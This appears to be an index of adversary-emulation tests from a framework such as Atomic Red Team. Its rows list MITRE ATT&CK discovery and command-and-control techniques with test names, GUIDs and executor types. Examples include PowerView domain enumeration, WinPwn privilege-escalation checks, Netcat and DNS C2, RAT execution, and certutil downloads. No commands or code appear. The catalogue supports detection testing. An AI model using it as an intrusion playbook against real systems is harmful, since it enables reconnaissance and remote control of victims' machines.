1157 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
1158 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 3 Detect Virtualization Environment (MacOS) a960185f-aef6-4547-8350-d1ce16680d09 sh
1159 discovery T1497.001 Virtualization/Sandbox Evasion: System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
1160 discovery T1069.002 Permission Groups Discovery: Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
1161 discovery T1069.002 Permission Groups Discovery: Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
1162 discovery T1069.002 Permission Groups Discovery: Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
1163 discovery T1069.002 Permission Groups Discovery: Domain Groups 4 Find machines where user has local admin access (PowerView) a2d71eee-a353-4232-9f86-54f4288dd8c1 powershell
1164 discovery T1069.002 Permission Groups Discovery: Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
1165 discovery T1069.002 Permission Groups Discovery: Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
1166 discovery T1069.002 Permission Groups Discovery: Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
1167 discovery T1069.002 Permission Groups Discovery: Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
1168 discovery T1069.002 Permission Groups Discovery: Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
1169 discovery T1069.002 Permission Groups Discovery: Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
1170 discovery T1069.002 Permission Groups Discovery: Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
1171 discovery T1069.002 Permission Groups Discovery: Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
1172 discovery T1069.002 Permission Groups Discovery: Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
1173 discovery T1007 System Service Discovery 1 System Service Discovery 89676ba1-b1f8-47ee-b940-2e1a113ebc71 command_prompt
1174 discovery T1007 System Service Discovery 2 System Service Discovery - net.exe 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 command_prompt
1175 discovery T1007 System Service Discovery 3 System Service Discovery - systemctl f4b26bce-4c2c-46c0-bcc5-fce062d38bef bash
1176 discovery T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
1177 discovery T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
1178 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
1179 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1180 discovery T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1181 discovery T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
1182 discovery T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
1183 discovery T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
1184 discovery T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
1185 discovery T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
1186 discovery T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
1187 discovery T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
1188 discovery T1135 Network Share Discovery 1 Network Share Discovery f94b5ad9-911c-4eff-9718-fd21899db4f7 sh
1189 discovery T1135 Network Share Discovery 2 Network Share Discovery - linux 875805bc-9e86-4e87-be86-3a5527315cae bash
1190 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt 20f1097d-81c1-405c-8380-32174d493bbb command_prompt
1191 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell 1b0814d1-bb24-402d-9615-1b20c50733fb powershell
1192 discovery T1135 Network Share Discovery 5 View available share drives ab39a04f-0c93-4540-9ff2-83f862c385ae command_prompt
1193 discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
1194 discovery T1135 Network Share Discovery 7 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
1195 discovery T1135 Network Share Discovery 8 WinPwn - shareenumeration 987901d1-5b87-4558-a6d9-cffcabc638b8 powershell
1196 discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
1197 discovery T1120 Peripheral Device Discovery 2 WinPwn - printercheck cb6e76ca-861e-4a7f-be08-564caa3e6f75 powershell
1198 discovery T1082 System Information Discovery 1 System Information Discovery 66703791-c902-4560-8770-42b8a91f7667 command_prompt
1199 discovery T1082 System Information Discovery 2 System Information Discovery edff98ec-0f73-4f63-9890-6b117092aff6 sh
1200 discovery T1082 System Information Discovery 3 List OS Information cccb070c-df86-4216-a5bc-9fb60c74e27c sh
1201 discovery T1082 System Information Discovery 4 Linux VM Check via Hardware 31dad7ad-2286-4c02-ae92-274418c85fec bash
1202 discovery T1082 System Information Discovery 5 Linux VM Check via Kernel Modules 8057d484-0fae-49a4-8302-4812c4f1e64e bash
1203 discovery T1082 System Information Discovery 6 Hostname Discovery (Windows) 85cfbf23-4a1e-4342-8792-007e004b975f command_prompt
1204 discovery T1082 System Information Discovery 7 Hostname Discovery 486e88ea-4f56-470f-9b57-3f4d73f39133 bash
1205 discovery T1082 System Information Discovery 8 Windows MachineGUID Discovery 224b4daf-db44-404e-b6b2-f4d1f0126ef8 command_prompt
1206 discovery T1082 System Information Discovery 9 Griffon Recon 69bd4abe-8759-49a6-8d21-0f15822d6370 powershell
1207 discovery T1082 System Information Discovery 10 Environment variables discovery on windows f400d1c0-1804-4ff8-b069-ef5ddd2adbf3 command_prompt
1208 discovery T1082 System Information Discovery 11 Environment variables discovery on macos and linux fcbdd43f-f4ad-42d5-98f3-0218097e2720 sh
1209 discovery T1082 System Information Discovery 12 Show System Integrity Protection status (MacOS) 327cc050-9e99-4c8e-99b5-1d15f2fb6b96 sh
1210 discovery T1082 System Information Discovery 13 WinPwn - winPEAS eea1d918-825e-47dd-acc2-814d6c58c0e1 powershell
1211 discovery T1082 System Information Discovery 14 WinPwn - itm4nprivesc 3d256a2f-5e57-4003-8eb6-64d91b1da7ce powershell
1212 discovery T1082 System Information Discovery 15 WinPwn - Powersploits privesc checks 345cb8e4-d2de-4011-a580-619cf5a9e2d7 powershell
1213 discovery T1082 System Information Discovery 16 WinPwn - General privesc checks 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed powershell
1214 discovery T1082 System Information Discovery 17 WinPwn - GeneralRecon 7804659b-fdbf-4cf6-b06a-c03e758590e8 powershell
1215 discovery T1082 System Information Discovery 18 WinPwn - Morerecon 3278b2f6-f733-4875-9ef4-bfed34244f0a powershell
1216 discovery T1082 System Information Discovery 19 WinPwn - RBCD-Check dec6a0d8-bcaf-4c22-9d48-2aee59fb692b powershell
1217 discovery T1082 System Information Discovery 20 WinPwn - PowerSharpPack - Watson searching for missing windows patches 07b18a66-6304-47d2-bad0-ef421eb2e107 powershell
1218 discovery T1082 System Information Discovery 21 WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors efb79454-1101-4224-a4d0-30c9c8b29ffc powershell
1219 discovery T1082 System Information Discovery 22 WinPwn - PowerSharpPack - Seatbelt 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 powershell
1220 discovery T1082 System Information Discovery 23 Azure Security Scan with SkyArk 26a18d3d-f8bc-486b-9a33-d6df5d78a594 powershell
1221 discovery T1082 System Information Discovery 24 Linux List Kernel Modules 034fe21c-3186-49dd-8d5d-128b35f181c7 sh
1222 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
1223 discovery T1217 Browser Bookmark Discovery 1 List Mozilla Firefox Bookmark Database Files on Linux 3a41f169-a5ab-407f-9269-abafdb5da6c2 sh
1224 discovery T1217 Browser Bookmark Discovery 2 List Mozilla Firefox Bookmark Database Files on macOS 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b sh
1225 discovery T1217 Browser Bookmark Discovery 3 List Google Chrome Bookmark JSON Files on macOS b789d341-154b-4a42-a071-9111588be9bc sh
1226 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome / Opera Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
1227 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
1228 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
1229 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
1230 discovery T1217 Browser Bookmark Discovery 8 List Safari Bookmarks on MacOS 5fc528dd-79de-47f5-8188-25572b7fafe0 sh
1231 discovery T1016 System Network Configuration Discovery 1 System Network Configuration Discovery on Windows 970ab6a1-0157-4f3f-9a73-ec4166754b23 command_prompt
1232 discovery T1016 System Network Configuration Discovery 2 List Windows Firewall Rules 038263cb-00f4-4b0a-98ae-0696c67e1752 command_prompt
1233 discovery T1016 System Network Configuration Discovery 3 System Network Configuration Discovery c141bbdb-7fca-4254-9fd6-f47e79447e17 sh
1234 discovery T1016 System Network Configuration Discovery 4 System Network Configuration Discovery (TrickBot Style) dafaf052-5508-402d-bf77-51e0700c02e2 command_prompt
1235 discovery T1016 System Network Configuration Discovery 5 List Open Egress Ports 4b467538-f102-491d-ace7-ed487b853bf5 powershell
1236 discovery T1016 System Network Configuration Discovery 6 Adfind - Enumerate Active Directory Subnet Objects 9bb45dd7-c466-4f93-83a1-be30e56033ee command_prompt
1237 discovery T1016 System Network Configuration Discovery 7 Qakbot Recon 121de5c6-5818-4868-b8a7-8fd07c455c1b command_prompt
1238 discovery T1016 System Network Configuration Discovery 8 List macOS Firewall Rules ff1d8c25-2aa4-4f18-a425-fede4a41ee88 bash
1239 discovery T1016 System Network Configuration Discovery 9 DNS Server Discovery Using nslookup 34557863-344a-468f-808b-a1bfb89b4fa9 command_prompt
1240 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
1241 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
1242 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
1243 discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
1244 discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
1245 discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
1246 discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
1247 discovery T1482 Domain Trust Discovery 8 TruffleSnout - Listing AD Infrastructure ea1b4f2d-5b82-4006-b64f-f2845608a3bf command_prompt
1248 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
1249 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
1250 discovery T1083 File and Directory Discovery 3 Nix File and Directory Discovery ffc8b249-372a-4b74-adcd-e4c0430842de sh
1251 discovery T1083 File and Directory Discovery 4 Nix File and Directory Discovery 2 13c5e1ae-605b-46c4-a79f-db28c77ff24e sh
1252 discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
1253 discovery T1083 File and Directory Discovery 6 Launch DirLister Executable c5bec457-43c9-4a18-9a24-fe151d8971b7 powershell
1254 discovery T1049 System Network Connections Discovery 1 System Network Connections Discovery 0940a971-809a-48f1-9c4d-b1d785e96ee5 command_prompt
1255 discovery T1049 System Network Connections Discovery 2 System Network Connections Discovery with PowerShell f069f0f1-baad-4831-aa2b-eddac4baac4a powershell
1256 discovery T1049 System Network Connections Discovery 3 System Network Connections Discovery Linux & MacOS 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 sh
1257 discovery T1049 System Network Connections Discovery 4 System Discovery using SharpView 96f974bb-a0da-4d87-a744-ff33e73367e9 powershell
1258 discovery T1619 Cloud Storage Object Discovery 1 AWS S3 Enumeration 3c7094f8-71ec-4917-aeb8-a633d7ec4ef5 sh
1259 discovery T1057 Process Discovery 1 Process Discovery - ps 4ff64f0b-aaf2-4866-b39d-38d9791407cc sh
1260 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
1261 discovery T1057 Process Discovery 3 Process Discovery - Get-Process 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 powershell
1262 discovery T1057 Process Discovery 4 Process Discovery - get-wmiObject b51239b4-0129-474f-a2b4-70f855b9f2c2 powershell
1263 discovery T1057 Process Discovery 5 Process Discovery - wmic process 640cbf6d-659b-498b-ba53-f6dd1a1cc02c command_prompt
1264 discovery T1069.001 Permission Groups Discovery: Local Groups 1 Permission Groups Discovery (Local) 952931a4-af0b-4335-bbbe-73c8c5b327ae sh
1265 discovery T1069.001 Permission Groups Discovery: Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
1266 discovery T1069.001 Permission Groups Discovery: Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
1267 discovery T1069.001 Permission Groups Discovery: Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
1268 discovery T1069.001 Permission Groups Discovery: Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 powershell
1269 discovery T1069.001 Permission Groups Discovery: Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
1270 discovery T1201 Password Policy Discovery 1 Examine password complexity policy - Ubuntu 085fe567-ac84-47c7-ac4c-2688ce28265b bash
1271 discovery T1201 Password Policy Discovery 2 Examine password complexity policy - CentOS/RHEL 7.x 78a12e65-efff-4617-bc01-88f17d71315d bash
1272 discovery T1201 Password Policy Discovery 3 Examine password complexity policy - CentOS/RHEL 6.x 6ce12552-0adb-4f56-89ff-95ce268f6358 bash
1273 discovery T1201 Password Policy Discovery 4 Examine password expiration policy - All Linux 7c86c55c-70fa-4a05-83c9-3aa19b145d1a bash
1274 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
1275 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
1276 discovery T1201 Password Policy Discovery 7 Examine password policy - macOS 4b7fa042-9482-45e1-b348-4b756b2a0742 bash
1277 discovery T1201 Password Policy Discovery 8 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
1278 discovery T1201 Password Policy Discovery 9 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
1279 discovery T1201 Password Policy Discovery 10 Use of SecEdit.exe to export the local security policy (including the password policy) 510cc97f-56ac-4cd3-a198-d3218c23d889 command_prompt
1280 discovery T1614.001 System Location Discovery: System Language Discovery 1 Discover System Language by Registry Query 631d4cf1-42c9-4209-8fe9-6bd4de9421be command_prompt
1281 discovery T1614.001 System Location Discovery: System Language Discovery 2 Discover System Language with chcp d91473ca-944e-477a-b484-0e80217cd789 command_prompt
1282 discovery T1012 Query Registry 1 Query Registry 8f7578c4-9863-4d83-875c-a565573bbdf0 command_prompt
1283 discovery T1012 Query Registry 2 Enumerate COM Objects in Registry with Powershell 0d80d088-a84c-4353-af1a-fc8b439f1564 powershell
1284 discovery T1518.001 Software Discovery: Security Software Discovery 1 Security Software Discovery f92a380f-ced9-491f-b338-95a991418ce2 command_prompt
1285 discovery T1518.001 Software Discovery: Security Software Discovery 2 Security Software Discovery - powershell 7f566051-f033-49fb-89de-b6bacab730f0 powershell
1286 discovery T1518.001 Software Discovery: Security Software Discovery 3 Security Software Discovery - ps (macOS) ba62ce11-e820-485f-9c17-6f3c857cd840 sh
1287 discovery T1518.001 Software Discovery: Security Software Discovery 4 Security Software Discovery - ps (Linux) 23b91cd2-c99c-4002-9e41-317c63e024a2 sh
1288 discovery T1518.001 Software Discovery: Security Software Discovery 5 Security Software Discovery - Sysmon Service fe613cf3-8009-4446-9a0f-bc78a15b66c9 command_prompt
1289 discovery T1518.001 Software Discovery: Security Software Discovery 6 Security Software Discovery - AV Discovery via WMI 1553252f-14ea-4d3b-8a08-d7a4211aa945 command_prompt
1290 discovery T1526 Cloud Service Discovery 1 Azure - Dump Subscription Data with MicroBurst 1e40bb1d-195e-401e-a86b-c192f55e005c powershell
1291 discovery T1018 Remote System Discovery 1 Remote System Discovery - net 85321a9c-897f-4a60-9f20-29788e50bccd command_prompt
1292 discovery T1018 Remote System Discovery 2 Remote System Discovery - net group Domain Computers f1bf6c8f-9016-4edf-aff9-80b65f5d711f command_prompt
1293 discovery T1018 Remote System Discovery 3 Remote System Discovery - nltest 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 command_prompt
1294 discovery T1018 Remote System Discovery 4 Remote System Discovery - ping sweep 6db1f57f-d1d5-4223-8a66-55c9c65a9592 command_prompt
1295 discovery T1018 Remote System Discovery 5 Remote System Discovery - arp 2d5a61f5-0447-4be4-944a-1f8530ed6574 command_prompt
1296 discovery T1018 Remote System Discovery 6 Remote System Discovery - arp nix acb6b1ff-e2ad-4d64-806c-6c35fe73b951 sh
1297 discovery T1018 Remote System Discovery 7 Remote System Discovery - sweep 96db2632-8417-4dbb-b8bb-a8b92ba391de sh
1298 discovery T1018 Remote System Discovery 8 Remote System Discovery - nslookup baa01aaa-5e13-45ec-8a0d-e46c93c9760f powershell
1299 discovery T1018 Remote System Discovery 9 Remote System Discovery - adidnsdump 95e19466-469e-4316-86d2-1dc401b5a959 command_prompt
1300 discovery T1018 Remote System Discovery 10 Adfind - Enumerate Active Directory Computer Objects a889f5be-2d54-4050-bd05-884578748bb4 command_prompt
1301 discovery T1018 Remote System Discovery 11 Adfind - Enumerate Active Directory Domain Controller Objects 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e command_prompt
1302 discovery T1018 Remote System Discovery 12 Remote System Discovery - ip neighbour 158bd4dd-6359-40ab-b13c-285b9ef6fa25 sh
1303 discovery T1018 Remote System Discovery 13 Remote System Discovery - ip route 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 sh
1304 discovery T1018 Remote System Discovery 14 Remote System Discovery - ip tcp_metrics 6c2da894-0b57-43cb-87af-46ea3b501388 sh
1305 discovery T1018 Remote System Discovery 15 Enumerate domain computers within Active Directory using DirectorySearcher 962a6017-1c09-45a6-880b-adc9c57cb22e powershell
1306 discovery T1018 Remote System Discovery 16 Enumerate Active Directory Computers with Get-AdComputer 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf powershell
1307 discovery T1018 Remote System Discovery 17 Enumerate Active Directory Computers with ADSISearcher 64ede6ac-b57a-41c2-a7d1-32c6cd35397d powershell
1308 discovery T1018 Remote System Discovery 18 Get-DomainController with PowerView b9d2e8ca-5520-4737-8076-4f08913da2c4 powershell
1309 discovery T1018 Remote System Discovery 19 Get-wmiobject to Enumerate Domain Controllers e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad powershell
1310 discovery T1018 Remote System Discovery 20 Remote System Discovery - net group Domain Controller 5843529a-5056-4bc1-9c13-a311e2af4ca0 command_prompt
1311 discovery T1046 Network Service Scanning 1 Port Scan 68e907da-2539-48f6-9fc9-257a78c05540 bash
1312 discovery T1046 Network Service Scanning 2 Port Scan Nmap 515942b0-a09f-4163-a7bb-22fefb6f185f sh
1313 discovery T1046 Network Service Scanning 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
1314 discovery T1046 Network Service Scanning 4 Port Scan using python 6ca45b04-9f15-4424-b9d3-84a217285a5c powershell
1315 discovery T1046 Network Service Scanning 5 WinPwn - spoolvulnscan 54574908-f1de-4356-9021-8053dd57439a powershell
1316 discovery T1046 Network Service Scanning 6 WinPwn - MS17-10 97585b04-5be2-40e9-8c31-82157b8af2d6 powershell
1317 discovery T1046 Network Service Scanning 7 WinPwn - bluekeep 1cca5640-32a9-46e6-b8e0-fabbe2384a73 powershell
1318 discovery T1046 Network Service Scanning 8 WinPwn - fruit bb037826-cbe8-4a41-93ea-b94059d6bb98 powershell
1319 discovery T1518 Software Discovery 1 Find and Display Internet Explorer Browser Version 68981660-6670-47ee-a5fa-7e74806420a4 command_prompt
1320 discovery T1518 Software Discovery 2 Applications Installed c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b powershell
1321 discovery T1518 Software Discovery 3 Find and Display Safari Browser Version 103d6533-fd2a-4d08-976a-4a598565280f sh
1322 discovery T1518 Software Discovery 4 WinPwn - Dotnetsearch 7e79a1b6-519e-433c-ad55-3ff293667101 powershell
1323 discovery T1518 Software Discovery 5 WinPwn - DotNet 10ba02d0-ab76-4f80-940d-451633f24c5b powershell
1324 discovery T1518 Software Discovery 6 WinPwn - powerSQL 0bb64470-582a-4155-bde2-d6003a95ed34 powershell
1325 discovery T1124 System Time Discovery 1 System Time Discovery 20aba24b-e61f-4b26-b4ce-4784f763ca20 command_prompt
1326 discovery T1124 System Time Discovery 2 System Time Discovery - PowerShell 1d5711d6-655c-4a47-ae9c-6503c74fa877 powershell
1327 discovery T1124 System Time Discovery 3 System Time Discovery in macOS f449c933-0891-407f-821e-7916a21a1a6f sh
1328 discovery T1124 System Time Discovery 4 System Time Discovery W32tm as a Delay d5d5a6b0-0f92-42d8-985d-47aafa2dd4db command_prompt
1329 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
1330 command-and-control T1132.001 Data Encoding: Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
1331 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
1332 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
1333 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
1334 command-and-control T1071.004 Application Layer Protocol: DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
1335 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
1336 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
1337 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
1338 command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
1339 command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
1340 command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
1341 command-and-control T1219 Remote Access Software 7 RemotePC Software Execution fbff3f1f-b0bf-448e-840f-7e1687affdce powershell
1342 command-and-control T1219 Remote Access Software 8 NetSupport - RAT Execution ecca999b-e0c8-40e8-8416-ad320b146a75 powershell
1343 command-and-control T1219 Remote Access Software 9 UltraViewer - RAT Execution 19acf63b-55c4-4b6a-8552-00a8865105c8 powershell
1344 command-and-control T1219 Remote Access Software 10 UltraVNC Execution 42e51815-a6cc-4c75-b970-3f0ff54b610e powershell
1345 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1346 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1347 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1348 command-and-control T1090.003 Proxy: Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
1349 command-and-control T1090.003 Proxy: Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
1350 command-and-control T1090.003 Proxy: Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
1351 command-and-control T1090.003 Proxy: Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
1352 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
1353 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
1354 command-and-control T1573 Encrypted Channel 1 OpenSSL C2 21caf58e-87ad-440c-a6b8-3ac259964003 powershell
1355 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
1356 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
1357 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
1358 command-and-control T1071.001 Application Layer Protocol: Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
1359 command-and-control T1071.001 Application Layer Protocol: Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
1360 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
1361 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
1362 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
1363 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
1364 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
1365 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
1366 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
1367 command-and-control T1105 Ingress Tool Transfer 7 certutil download (urlcache) dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 command_prompt
1368 command-and-control T1105 Ingress Tool Transfer 8 certutil download (verifyctl) ffd492e3-0455-4518-9fb1-46527c9f241b powershell
1369 command-and-control T1105 Ingress Tool Transfer 9 Windows - BITSAdmin BITS Download a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b command_prompt
